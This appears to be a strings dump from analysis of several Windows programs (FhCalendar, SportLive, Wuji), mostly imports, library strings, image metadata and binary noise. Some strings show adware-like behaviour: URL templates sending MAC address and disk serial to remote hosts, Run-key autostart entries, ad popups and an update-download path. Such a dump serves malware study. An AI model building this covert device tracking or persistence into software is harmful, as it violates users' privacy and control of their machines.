#ff0000}%s{/c}</pre><pre>http://client.fhrlw.com/Api/GetHoliday.ashx</pre><pre>http://client.fhrlw.com/Api/GetWeather.ashx?province=%s&city=%s</pre><pre>ohttp://client.fhrlw.com/Api/SendClickData.ashx?pid=%d&psid=%d&setupcode=%s&mac=%s&physn=%s&date=%s&clickcount1=%d&clickcount2=%d&clickcount3=%d&clickcount4=%d</pre><pre>http://client.fhrlw.com/Api/Sendndays2openData.ashx?pid=%d&psid=%d&setupcode=%s&mac=%s&physn=%s&ndays=%d</pre><pre>http://client.fhrlw.com/Api/getRightDownState.ashx?pid=%d&psid=%d&setupcode=%s&mac=%s&physn=%s</pre><pre>http://client.fhrlw.com/Api/onlineLength.ashx?pid=%d&psid=%d&setupcode=%s&mac=%s&physn=%s</pre><pre>http://client.fhrlw.com/api/GetConfig.ashx</pre><pre>xhlwnd.xml</pre><pre>EKey</pre><pre>dd</pre><pre>%s<n>%s</n></pre><pre><f 2="2">%s</f><n><f 2="2">%s</f></n></pre><pre>%Y-%m-%d %H:%M:%S</pre><pre>MiniWebWnd</pre><pre>xminiweb.xml</pre><pre>web_info</pre><pre>http://client.fhrlw.com/mini.html?id=%d</pre><pre>EPopWebWnd</pre><pre>xpopweb.xml</pre><pre>http://client.fhrlw.com/ad/popad.html?id=%d</pre><pre>\\.\PhysicalDrive%d</pre><pre>\\.\Scsi%d:</pre><pre>%%%2x</pre><pre>%Program Files%\fhrl\FhCalendar.exe</pre><pre>All Files (*.*)</pre><pre>No error message is available.#Attempted an unsupported operation.$A required resource was unavailable.</pre><pre>Command failed.)Insufficient memory to perform operation.PSystem registry entries have been removed and the INI file (if any) was deleted.BNot all of the system registry entries (or INI file) were removed.FThis program requires the file %s, which was not found on this system.tThis program is linked to the missing export %s in the file %s. This machine may have an incompatible version of %s.</pre><pre>Destination disk drive is full.5Unable to read from %1, it is opened by someone else.AUnable to write to %1, it is read-only or opened by someone else.1Encountered an unexpected error while reading %1.1Encountered an unexpected error while writing %1.</pre><pre>#Unable to load mail system support.</pre><pre>1.0.0.1</pre><pre>FhCalendar.exe</pre><b>MSIB.tmp_916:</b><pre>.text</pre><pre>`.rdata</pre><pre>@.data</pre><pre>.rsrc</pre><pre>@.reloc</pre><pre>KERNEL32.dll</pre><pre>ShellExecuteW</pre><pre>ShellExecuteExW</pre><pre>SHELL32.dll</pre><pre><requestedExecutionLevel level="asInvoker" uiAccess="false"></requestedExecutionLevel></pre><pre>11.0.0.0</pre><pre>viewer.exe</pre><b>SportLive.exe_908:</b><pre>.text</pre><pre>.rdata</pre><pre>.data</pre><pre>.rsrc</pre><pre>.reloc</pre><pre>.aspack</pre><pre>.adata</pre><pre>Pht%D</pre><pre>CCmdTarget</pre><pre>CNotSupportedException</pre><pre>hhctrl.ocx</pre><pre>f:\dd\vctools\vc7libs\ship\atlmfc\include\afxwin2.inl</pre><pre>commctrl_DragListMsg</pre><pre>f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\winctrl2.cpp</pre><pre>f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\filecore.cpp</pre><pre>comctl32.dll</pre><pre>comdlg32.dll</pre><pre>shell32.dll</pre><pre>Software\Microsoft\Windows\CurrentVersion\Policies\Explorer</pre><pre>Software\Microsoft\Windows\CurrentVersion\Policies\Network</pre><pre>Software\Microsoft\Windows\CurrentVersion\Policies\Comdlg32</pre><pre>ntdll.dll</pre><pre>kernel32.dll</pre><pre>%s%s.dll</pre><pre>f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\appcore.cpp</pre><pre>mfcm90.dll</pre><pre>f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\auxdata.cpp</pre><pre>user32.dll</pre><pre>ole32.dll</pre><pre>Please contact the application's support team for more information.</pre><pre>- Attempt to initialize the CRT more than once.</pre><pre>- CRT not initialized</pre><pre>- floating point support not loaded</pre><pre>operator</pre><pre>GetProcessWindowStation</pre><pre>USER32.DLL</pre><pre>OLEACC.dll</pre><pre>\Liveconfig.ini</pre><pre>%A,%B,%d,%Y</pre><pre>D:\Program Files (x86)\Microsoft Visual Studio 9.0\VC\atlmfc\include\afxwin1.inl</pre><pre>%s (%s:%d)</pre><pre>images\tab_bg.png</pre><pre>images\tabclose1.png</pre><pre>images\tabclose2.png</pre><pre>images\tabclose3.png</pre><pre>images\tab_item1.png</pre><pre>images\tab_item2.png</pre><pre>images\tab_item3.png</pre><pre>http://sport.yuejan.com/online/html/events/ad.html</pre><pre>http://sport.yuejan.com/online/html/events/event.html</pre><pre>sports.cntv.cn</pre><pre>tv.cntv.cn</pre><pre>apps.sports.cntv.cn</pre><pre>live.video.sina.com.cn/room/</pre><pre>Software\Microsoft\Windows\CurrentVersion\Run</pre><pre>KeyName=%s</pre><pre>\\.\PhysicalDrive%d</pre><pre>X-X-X-X-X-X</pre><pre>%Program Files%\xxss.ini</pre><pre>http://dif.9yfc.com/cloudy/iau.xhtml?op=active&st=1&ma=</pre><pre>CWebPage</pre><pre>F:\project\SprotLive\Release\</pre><pre>GetCPInfo</pre><pre>GetConsoleOutputCP</pre><pre>KERNEL32.dll</pre><pre>CreateDialogIndirectParamA</pre><pre>GetKeyState</pre><pre>UnhookWindowsHookEx</pre><pre>SetWindowsHookExA</pre><pre>USER32.dll</pre><pre>GetViewportExtEx</pre><pre>SetViewportOrgEx</pre><pre>OffsetViewportOrgEx</pre><pre>SetViewportExtEx</pre><pre>ScaleViewportExtEx</pre><pre>GDI32.dll</pre><pre>COMDLG32.dll</pre><pre>WINSPOOL.DRV</pre><pre>RegCreateKeyExA</pre><pre>RegCloseKey</pre><pre>RegOpenKeyExA</pre><pre>RegOpenKeyA</pre><pre>RegDeleteKeyA</pre><pre>RegEnumKeyA</pre><pre>ADVAPI32.dll</pre><pre>SHELL32.dll</pre><pre>COMCTL32.dll</pre><pre>SHLWAPI.dll</pre><pre>oledlg.dll</pre><pre>OLEAUT32.dll</pre><pre>gdiplus.dll</pre><pre>IPHLPAPI.DLL</pre><pre>GetProcessHeap</pre><pre>.?AVCCmdUI@@</pre><pre>.PAVCMemoryException@@</pre><pre>.PAVCSimpleException@@</pre><pre>.PAVCObject@@</pre><pre>.PAVCNotSupportedException@@</pre><pre>.PAVCInvalidArgException@@</pre><pre>.?AVCNotSupportedException@@</pre><pre>.?AVCTestCmdUI@@</pre><pre>.PAVCUserException@@</pre><pre>.PAVCOleException@@</pre><pre>.PAVCOleDispatchException@@</pre><pre>.?AV?$CFixedStringT@V?$CStringT@_WV?$StrTraitMFC@_WV?$ChTraitsCRT@_W@ATL@@@@@ATL@@$0BAA@@ATL@@</pre><pre>.?AV?$CStringT@_WV?$StrTraitMFC@_WV?$ChTraitsCRT@_W@ATL@@@@@ATL@@</pre><pre>.PAVCResourceException@@</pre><pre>.PAVCArchiveException@@</pre><pre>.PAVCFileException@@</pre><pre>zcÁ</pre><pre>.?AVCCmdTarget@@</pre><pre>.PAVCException@@</pre><pre>.?AVCWebPage@@</pre><pre>%Program Files%\xxdd\SportLive.exe</pre><pre>%Program Files%\xxdd\Liveconfig.ini</pre><pre>jJs%C*</pre><pre>9D<.KA</pre><pre>Tev%CP</pre><pre>K p<<c.sL</pre><pre>%F-yg</pre><pre>^L)%X,</pre><pre>.fQEC)</pre><pre>k.KKS</pre><pre>`t":.rZ"</pre><pre>.UH8&</pre><pre>h%F& t</pre><pre>*.Aqr</pre><pre>%F-<K><pre>%D-<K><pre>.XXPmUx</pre><pre>8.Da`</pre><pre>5.lbK</pre><pre>K5.Ac</pre><pre>!,.WD</pre><pre>x.Dzu</pre><pre>.ZO $r</pre><pre>jsF%f</pre><pre>B.bc'</pre><pre>lX%S:Gm</pre><pre>Sò/</pre><pre>R<#D.Lps</pre><pre>ò4 </pre><pre>.hfpv/m</pre><pre>.gAP]y</pre><pre>%CR-<</pre><pre>2R.bz</pre><pre>mQh%x</pre><pre>.LTb`</pre><pre>esQLo</pre><pre>aQt.bp</pre><pre>|5%s'</pre><pre>;.FE~</pre><pre>Ji%fG</pre><pre>.MyS!</pre><pre>%dL<K><pre>c.UnG</pre><pre>N9.HG*f</pre><pre>&s%U2N</pre><pre>a#^L%C^,$k</pre><pre>oA.tc2&</pre><pre>c.GWC/B</pre><pre>.Tl2P</pre><pre>22=.pA</pre><pre>')KEY$</pre><pre>Sj Þ^J</pre><pre>q%XMs</pre><pre>H.fb:</pre><pre>S%S6E</pre><pre>v:yu%f</pre><pre>.UrZk</pre><pre>xQi@%X</pre><pre>.DlDR</pre><pre>Z6.af}7E</pre><pre>i]}sGtCp</pre><pre>%C'E}</pre><pre>n".HbU</pre><pre>N9Y%D</pre><pre>EOO .lj</pre><pre>1.ndY</pre><pre>.trQQ</pre><pre>2\AýD</pre><pre>-%%u(</pre><pre>rM.en</pre><pre>,V.DfB</pre><pre>",Í</pre><pre>g.Ov[*g</pre><pre>P%UX:u</pre><pre>s.tqe</pre><pre>eR.iQ</pre><pre>Mq.FlO4</pre><pre>.fL$V</pre><pre>J.Tj@</pre><pre>.dT}<</pre><pre>1Et ß</pre><pre>%s%:k</pre><pre>mP.pO</pre><pre>LT&4X.LQ<</pre><pre>.ewFy</pre><pre>w.VUO</pre><pre>!l<L><pre>x`%C$</pre><pre>wV5_U%u</pre><pre>r7.kJ</pre><pre>5.zOE=</pre><pre>.K.Uq</pre><pre>Y.fl|</pre><pre>Af.hd=</pre><pre>p%XD@</pre><pre>.nfqi</pre><pre>/k.qa</pre><pre>S%d#/</pre><pre> 'Q%s</pre><pre>Pw.QC</pre><pre>[ya3K%u</pre><pre>^L%9X-,</pre><pre>%Do,}</pre><pre>v/%x s</pre><pre>%&%.xN</pre><pre>9!%u _)</pre><pre>%sOeK#</pre><pre>L.hDX</pre><pre>(%.Lj</pre><pre>%d,$k</pre><pre>SQ%S"{3</pre><pre>-.Qg=</pre><pre>@.iT'P</pre><pre>x .Xs</pre><pre>}U-j} </pre><pre>2&2tF%FS</pre><pre>MCRT</pre><pre>^J}%f,<</pre><pre>gA[a%x@</pre><pre>.bwrxR</pre><pre>1V.Tz</pre><pre>YK%UL</pre><pre>)h.OY</pre><pre>.vJcw</pre><pre>o.BJ2</pre><pre>E;.SMS</pre><pre>%C\,<</pre><pre>@I*ËBM</pre><pre>R..xu</pre><pre>ÞlE></pre><pre>%fl k</pre><pre>m.Vbu</pre><pre>,(%u0</pre><pre>.Tk>X</pre><pre>.doBn</pre><pre>Bv%%f</pre><pre>%f,,k</pre><pre>*.Qg9bif</pre><pre>.TT=U</pre><pre>tB.pl</pre><pre>D=.ST</pre><pre>È '[</pre><pre>dy%XY</pre><pre>.TKyq</pre><pre>AE.wL</pre><pre>f0'.Pe</pre><pre>%UtD%</pre><pre>LG7%u</pre><pre>%1U8*></pre><pre>JG$.Ir</pre><pre>^KI%dL<k><pre>_.zY^</pre><pre>#e#b.ig</pre><pre>.DQ:DI</pre><pre>@xdH</pre><pre>C7%c:#</pre><pre>^K%CV,</pre><pre>~.GlkXAV</pre><pre>lSqL</pre><pre>GM.fG^`</pre><pre>C3.tH</pre><pre>N#KEy</pre><pre>sL%SY:3'</pre><pre>u:\^q</pre><pre>~.Lz/;"%</pre><pre>U%d.PVS</pre><pre>8.axb</pre><pre>1[s%D</pre><pre>`#?eXe</pre><pre>cúo</pre><pre>%XH\XzT"</pre><pre>.pQF(</pre><pre>LI%X-@</pre><pre>d.KM/</pre><pre>.gdGT1</pre><pre>Qx.KP</pre><pre>%f,}vh</pre><pre>uuBTcpaB</pre><pre>\R%DhG</pre><pre>jSLJJik.BCV</pre><pre>luRl</pre><pre>V(]E.ie</pre><pre>7!.va</pre><pre>X|I.Xiky</pre><pre>)Y.iu</pre><pre>LMSg</pre><pre>Eq0%X</pre><pre>$scm%X</pre><pre>%F Q21Sm</pre><pre>30}L2</pre><pre>K-a}BD;</pre><pre>zH.lG</pre><pre>!H8UX%s</pre><pre>4]j%7Uu</pre><pre>Wj.bL</pre><pre>.xzev</pre><pre>Xiy%x</pre><pre>%dL$k</pre><pre>O$Ç</pre><pre>v> .bt</pre><pre>wdGwG%s</pre><pre>%8x."@</pre><pre>.aK>5</pre><pre>^JÏL</pre><pre>:Vk.Tl</pre><pre>a.EDY</pre><pre>.gQ&c</pre><pre>Kg.MFQZ</pre><pre>r.aK;</pre><pre>4.qrq</pre><pre>7333332</pre><pre>OU)>M</pre><pre>.uUUs</pre><pre>.UVVg</pre><pre>aKi.Xa</pre><pre>Q )Odc.eff</pre><pre>ee%.s)</pre><pre>f.mAYU</pre><pre>d.UVK</pre><pre>c%cRU[</pre><pre>%x< *</pre><pre>h:\J[</pre><pre>)%fl$K</pre><pre>Ay.KV</pre><pre>%Xa(_</pre><pre>b/(%XD</pre><pre>1.Tb2</pre><pre>.Ds3E<</pre><pre>.jL`Oz_</pre><pre>E.EGF</pre><pre>^KuMsG</pre><pre>.MF;e</pre><pre>%dL4k</pre><pre>m%fL4K</pre><pre>%9S.<</pre><pre>9 .ud</pre><pre>#.bIA</pre><pre>QJ%4s</pre><pre>0~.Au</pre><pre>W/%Ut</pre><pre>!=%DG</pre><pre>)(@:::5%</pre><pre>CRP%x</pre><pre>{IjP.tk%</pre><pre>%Ck\3R</pre><pre>%fl4K</pre><pre>H6).nO</pre><pre>.VD8VEmg K</pre><pre>Q=f\LA%f</pre><pre>iXZ.td EJ</pre><pre>Ppr-5P}</pre><pre>#Ha%CQf</pre><pre>I-f}3</pre><pre>f#|</pre><pre>QV.bp</pre><pre>%URiz</pre><pre>.EEr8</pre><pre>q.iQf</pre><pre>C.SJw </pre><pre>.qsn8q</pre><pre>.BS=uV</pre><pre>.dL9)</pre><pre>I%dl4</pre><pre>9%fU/</pre><pre>_J@%D</pre><pre>".DZ(</pre><pre>ZH.GP</pre><pre>Nzl%uu</pre><pre>.qHF^</pre><pre>|I.qh</pre><pre>,b50z3.Bq</pre><pre>.CWU!</pre><pre>.DfTb]</pre><pre>.it-&D? </pre><pre>q&.id</pre><pre>Mj.gv</pre><pre>^k.uH$</pre><pre>\Ku%d</pre><pre>%x-@D</pre><pre>?5.MS</pre><pre>.hU&W</pre><pre>/.xVy</pre><pre>Ë d</pre><pre>.qQGFG</pre><pre>b'Ä</pre><pre>.UHf5 1</pre><pre>Wk"@.Xg</pre><pre>{>.sN<n%><pre>(.Bpr</pre><pre>%dL@k</pre><pre>.Ptj?</pre><pre>G%xu)F</pre><pre>url\{X</pre><pre>`2.TEHR</pre><pre>?Bx%F</pre><pre>%u$qP</pre><pre>4U5.Wm</pre><pre>1M.dWa</pre><pre>wA.IL</pre><pre>;P"F%C</pre><pre>.Ul56</pre><pre>f.ZqB</pre><pre>.du)@</pre><pre>Vm.dv:Q</pre><pre>nf.MI</pre><pre>oOuk)s{%U[</pre><pre>.rXW(</pre><pre>:%2x\D</pre><pre>z%djt</pre><pre>)).RwS</pre><pre>-z}s-]</pre><pre>%xQ#Y</pre><pre>(t %fN</pre><pre>%c-V,</pre><pre>#%CX\</pre><pre>q"Y.uPbXk</pre><pre>}.YRr</pre><pre>J(B/.Tv</pre><pre>5%dur</pre><pre>.bsf`?</pre><pre>)%d,<</pre><pre>Rb.ht</pre><pre>Q.AV#</pre><pre>"zO%f</pre><pre>A"p</pre><pre>.osWF</pre><pre>?.yy@</pre><pre>W%cpA</pre><pre>c.Yvhr</pre><pre>.bfAAN?</pre><pre>^Jq%d</pre><pre>\:%x"</pre><pre>Vj/n%fg</pre><pre>&]D'%fp</pre><pre>;'k%d~</pre><pre>iho.TH</pre><pre>|d.EH</pre><pre>w.gNY</pre><pre>.bl0Z</pre><pre>RP%D`</pre><pre>.VyKe</pre><pre>C.bbL$</pre><pre>qF%D$</pre><pre>R7X`%c</pre><pre>h=.QT</pre><pre>V(j{%S</pre><pre>&@M</pre><pre>eWEb</pre><pre>a.Lt></pre><pre>:4.MIcX</pre><pre>y.lT\n</pre><pre>%E.oI</pre><pre>D1%Dr</pre><pre>;Mn%F</pre><pre>}F%5S\</pre><pre>-Bi}M9</pre><pre>P].yv</pre><pre>~.rl^</pre><pre>VLn;P.au</pre><pre>.IoK(</pre><pre>7uu</pre><pre>Q:\2y</pre><pre>@.cSx8H\</pre><pre>6qN%U</pre><pre>46.wjJ</pre><pre>iTXtXML:com.adobe.xmp</pre><pre>" id="W5M0MpCehiHzreSzNTczkc9d"?> <x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 5.0-c060 61.134777, 2010/02/12-17:32:00 "> <rdf:RDF xmlns:rdf="http://www.w3.org/1999/02/22-rdf-syntax-ns#"> <rdf:Description rdf:about="" xmlns:xmp="http://ns.adobe.com/xap/1.0/" xmlns:xmpMM="http://ns.adobe.com/xap/1.0/mm/" xmlns:stRef="http://ns.adobe.com/xap/1.0/sType/ResourceRef#" xmp:CreatorTool="Adobe Photoshop CS5 Windows" xmpMM:InstanceID="xmp.iid:1405FFA5061411E3A66E8352AA12703D" xmpMM:DocumentID="xmp.did:1405FFA6061411E3A66E8352AA12703D"> <xmpMM:DerivedFrom stRef:instanceID="xmp.iid:1405FFA3061411E3A66E8352AA12703D" stRef:documentID="xmp.did:1405FFA4061411E3A66E8352AA12703D" /> </rdf:Description> </rdf:RDF> </x:xmpmeta> <?xpacket end="r"?></pre><pre>.Twyy</pre><pre>" id="W5M0MpCehiHzreSzNTczkc9d"?> <x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 5.0-c060 61.134777, 2010/02/12-17:32:00 "> <rdf:RDF xmlns:rdf="http://www.w3.org/1999/02/22-rdf-syntax-ns#"> <rdf:Description rdf:about="" xmlns:xmp="http://ns.adobe.com/xap/1.0/" xmlns:xmpMM="http://ns.adobe.com/xap/1.0/mm/" xmlns:stRef="http://ns.adobe.com/xap/1.0/sType/ResourceRef#" xmp:CreatorTool="Adobe Photoshop CS5 Windows" xmpMM:InstanceID="xmp.iid:CDA243D50BBA11E3BD1B8399A9672FB8" xmpMM:DocumentID="xmp.did:CDA243D60BBA11E3BD1B8399A9672FB8"> <xmpMM:DerivedFrom stRef:instanceID="xmp.iid:CDA243D30BBA11E3BD1B8399A9672FB8" stRef:documentID="xmp.did:CDA243D40BBA11E3BD1B8399A9672FB8" /> </rdf:Description> </rdf:RDF> </x:xmpmeta> <?xpacket end="r"?>Thz5</pre><pre>diTXtXML:com.adobe.xmp</pre><pre>" id="W5M0MpCehiHzreSzNTczkc9d"?> <x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 5.0-c060 61.134777, 2010/02/12-17:32:00 "> <rdf:RDF xmlns:rdf="http://www.w3.org/1999/02/22-rdf-syntax-ns#"> <rdf:Description rdf:about="" xmlns:xmpMM="http://ns.adobe.com/xap/1.0/mm/" xmlns:stRef="http://ns.adobe.com/xap/1.0/sType/ResourceRef#" xmlns:xmp="http://ns.adobe.com/xap/1.0/" xmpMM:OriginalDocumentID="xmp.did:6813E5CB910BE31191A789C5D0E269E2" xmpMM:DocumentID="xmp.did:EB6F6CFF0BBC11E3AE59D4B86C485946" xmpMM:InstanceID="xmp.iid:EB6F6CFE0BBC11E3AE59D4B86C485946" xmp:CreatorTool="Adobe Photoshop CS5 Windows"> <xmpMM:DerivedFrom stRef:instanceID="xmp.iid:6813E5CB910BE31191A789C5D0E269E2" stRef:documentID="xmp.did:6813E5CB910BE31191A789C5D0E269E2" /> </rdf:Description> </rdf:RDF> </x:xmpmeta> <?xpacket end="r"?></pre><pre>" id="W5M0MpCehiHzreSzNTczkc9d"?> <x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 5.0-c060 61.134777, 2010/02/12-17:32:00 "> <rdf:RDF xmlns:rdf="http://www.w3.org/1999/02/22-rdf-syntax-ns#"> <rdf:Description rdf:about="" xmlns:xmp="http://ns.adobe.com/xap/1.0/" xmlns:xmpMM="http://ns.adobe.com/xap/1.0/mm/" xmlns:stRef="http://ns.adobe.com/xap/1.0/sType/ResourceRef#" xmp:CreatorTool="Adobe Photoshop CS5 Windows" xmpMM:InstanceID="xmp.iid:F61CD52B0BBA11E39778AEF7B3A21195" xmpMM:DocumentID="xmp.did:F61CD52C0BBA11E39778AEF7B3A21195"> <xmpMM:DerivedFrom stRef:instanceID="xmp.iid:F61CD5290BBA11E39778AEF7B3A21195" stRef:documentID="xmp.did:F61CD52A0BBA11E39778AEF7B3A21195" /> </rdf:Description> </rdf:RDF> </x:xmpmeta> <?xpacket end="r"?></pre><pre>" id="W5M0MpCehiHzreSzNTczkc9d"?> <x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 5.0-c060 61.134777, 2010/02/12-17:32:00 "> <rdf:RDF xmlns:rdf="http://www.w3.org/1999/02/22-rdf-syntax-ns#"> <rdf:Description rdf:about="" xmlns:xmp="http://ns.adobe.com/xap/1.0/" xmlns:xmpMM="http://ns.adobe.com/xap/1.0/mm/" xmlns:stRef="http://ns.adobe.com/xap/1.0/sType/ResourceRef#" xmp:CreatorTool="Adobe Photoshop CS5 Windows" xmpMM:InstanceID="xmp.iid:690E21BC1E8111E3890F9E8C651F0308" xmpMM:DocumentID="xmp.did:690E21BD1E8111E3890F9E8C651F0308"> <xmpMM:DerivedFrom stRef:instanceID="xmp.iid:690E21BA1E8111E3890F9E8C651F0308" stRef:documentID="xmp.did:690E21BB1E8111E3890F9E8C651F0308" /> </rdf:Description> </rdf:RDF> </x:xmpmeta> <?xpacket end="r"?>=</pre><pre>" id="W5M0MpCehiHzreSzNTczkc9d"?> <x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 5.0-c060 61.134777, 2010/02/12-17:32:00 "> <rdf:RDF xmlns:rdf="http://www.w3.org/1999/02/22-rdf-syntax-ns#"> <rdf:Description rdf:about="" xmlns:xmp="http://ns.adobe.com/xap/1.0/" xmlns:xmpMM="http://ns.adobe.com/xap/1.0/mm/" xmlns:stRef="http://ns.adobe.com/xap/1.0/sType/ResourceRef#" xmp:CreatorTool="Adobe Photoshop CS5 Windows" xmpMM:InstanceID="xmp.iid:ED16D5261EA511E3B21FD5142BC3ECF6" xmpMM:DocumentID="xmp.did:ED16D5271EA511E3B21FD5142BC3ECF6"> <xmpMM:DerivedFrom stRef:instanceID="xmp.iid:ED16D5241EA511E3B21FD5142BC3ECF6" stRef:documentID="xmp.did:ED16D5251EA511E3B21FD5142BC3ECF6" /> </rdf:Description> </rdf:RDF> </x:xmpmeta> <?xpacket end="r"?>8</pre><pre>.hH'"</pre><pre>'.dDji</pre><pre>" id="W5M0MpCehiHzreSzNTczkc9d"?> <x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 5.0-c060 61.134777, 2010/02/12-17:32:00 "> <rdf:RDF xmlns:rdf="http://www.w3.org/1999/02/22-rdf-syntax-ns#"> <rdf:Description rdf:about="" xmlns:xmpMM="http://ns.adobe.com/xap/1.0/mm/" xmlns:stRef="http://ns.adobe.com/xap/1.0/sType/ResourceRef#" xmlns:xmp="http://ns.adobe.com/xap/1.0/" xmpMM:OriginalDocumentID="xmp.did:998416A1B573E311B2FCE348ED0BFFDD" xmpMM:DocumentID="xmp.did:F2EFE278939111E3825F920E2590D74E" xmpMM:InstanceID="xmp.iid:F2EFE277939111E3825F920E2590D74E" xmp:CreatorTool="Adobe Photoshop CS5 Windows"> <xmpMM:DerivedFrom stRef:instanceID="xmp.iid:D52A66E69193E3118647F353FF5C7A7F" stRef:documentID="xmp.did:978416A1B573E311B2FCE348ED0BFFDD" /> </rdf:Description> </rdf:RDF> </x:xmpmeta> <?xpacket end="r"?>3^</pre><pre>/%$]]](((</pre><pre>>-i7%DRG$</pre><pre>F1kL%U</pre><pre>The procedure entry point %s could not be located in the dynamic link library %s</pre><pre>The ordinal %u could not be located in the dynamic link library %s</pre><pre>gdi32.dll</pre><pre>winspool.drv</pre><pre>advapi32.dll</pre><pre>shlwapi.dll</pre><pre>oleaut32.dll</pre><pre>iphlpapi.dll</pre><pre><requestedExecutionLevel level="requireAdministrator" uiAccess="false"></requestedExecutionLevel></pre><pre>accKeyboardShortcut</pre><pre>ekernel32.dll</pre><pre>mscoree.dll</pre><pre>KERNEL32.DLL</pre><pre>6.0.1</pre><pre>{8856F961-340A-11D0-A96B-00C04FD705A2}</pre><pre>(*.*)</pre><pre>1.0.1</pre><pre>SprotLive.exe</pre><b>Wuji.exe_568:</b><pre>.text</pre><pre>`.data</pre><pre>.rsrc</pre><pre>MSVBVM60.DLL</pre><pre>.Play78QQForm</pre><pre>.Play78QQButton</pre><pre>SHDocVwCtl.WebBrowser</pre><pre>#vb6chs.dll</pre><pre>shdocvw.dll</pre><pre>WebBrowser</pre><pre>D:\Program Files\Microsoft Visual Studio\VB98\VB6.OLB</pre><pre>H:\WINDOWS\system32\shdocvw.oca</pre><pre>GetAsyncKeyState</pre><pre>shell32.dll</pre><pre>ShellExecuteA</pre><pre>DeleteUrlCacheEntryA</pre><pre>user32.dll</pre><pre>Wuji.ime</pre><pre>advapi32.dll</pre><pre>RegCreateKeyA</pre><pre>RegCloseKey</pre><pre>GetProcessHeap</pre><pre>kernel32.dll</pre><pre>H:\WINDOWS\system32\MSVBVM60.DLL\3</pre><pre>COMDLG32.DLL</pre><pre>FH:\WINDOWS\system32\stdole2.tlb</pre><pre>VBA6.DLL</pre><pre>Keys</pre><pre>.kJC_a\</pre><pre>I|.....4444445555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555.zI</pre><pre>Ey ....11111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111.......yE</pre><pre>All (*.*)| *.*</pre><pre>New_Key</pre><pre>http:///</pre><pre>SOFTWARE\Microsoft\Windows\CurrentVersion\Run</pre><pre>http://www.miaoxia123.com</pre><pre>\Wuji.dat</pre><pre>Wuji.dat</pre><pre>\Show.dat</pre><pre>Show.dat</pre><pre>http://www.mi</pre><pre>a123.net/</pre><pre>gmts:\\.\ro</pre><pre>st.ex</pre><pre>install.php?login=</pre><pre>Email:ggxzabcc@163.com http://www.miaoxia123.com</pre><pre>*.TXT</pre><pre>|*.txt</pre><pre>onlinefirst.php?user=</pre><pre>\update.exe</pre><pre>WindowState</pre><pre>.commonDialog</pre><pre>.VBError</pre><pre>Windows 95 OSR2</pre><pre>Windows 95</pre><pre>Windows 98 SE</pre><pre>Windows 98</pre><pre>Windows ME</pre><pre>Windows 2000 Data center</pre><pre>Windows 2000 Advanced</pre><pre>Windows 2000</pre><pre>Windows Vista</pre><pre>Windows XP Professional</pre><pre>Windows XP Home</pre><pre>Windows XP</pre><pre>Windows Server 2003 Enterprise</pre><pre>Windows Server 2003 Data center</pre><pre>Windows Server 2003 Web Edition</pre><pre>Windows Server 2003 Standard</pre><pre>Windows Server 2003</pre><pre>Web Server Edition</pre><pre>Windows Vista Server 2008</pre><pre>Windows 7</pre><pre>6.2.9200</pre><pre>Windows 8</pre><pre>Windows 8.1</pre><pre>5.0.2195</pre><pre>Windows 2000</pre><pre>Windows</pre><pre>5.2.3790</pre><pre>Windows Other</pre><pre>000000000000</pre><pre>http://</pre><pre>online.php?user=</pre></pre></n%></pre></pre></pre></k></pre></pre></pre></L></pre></pre></pre></K></pre></pre></K></pre></K></pre></x%x></pre></e></pre></S>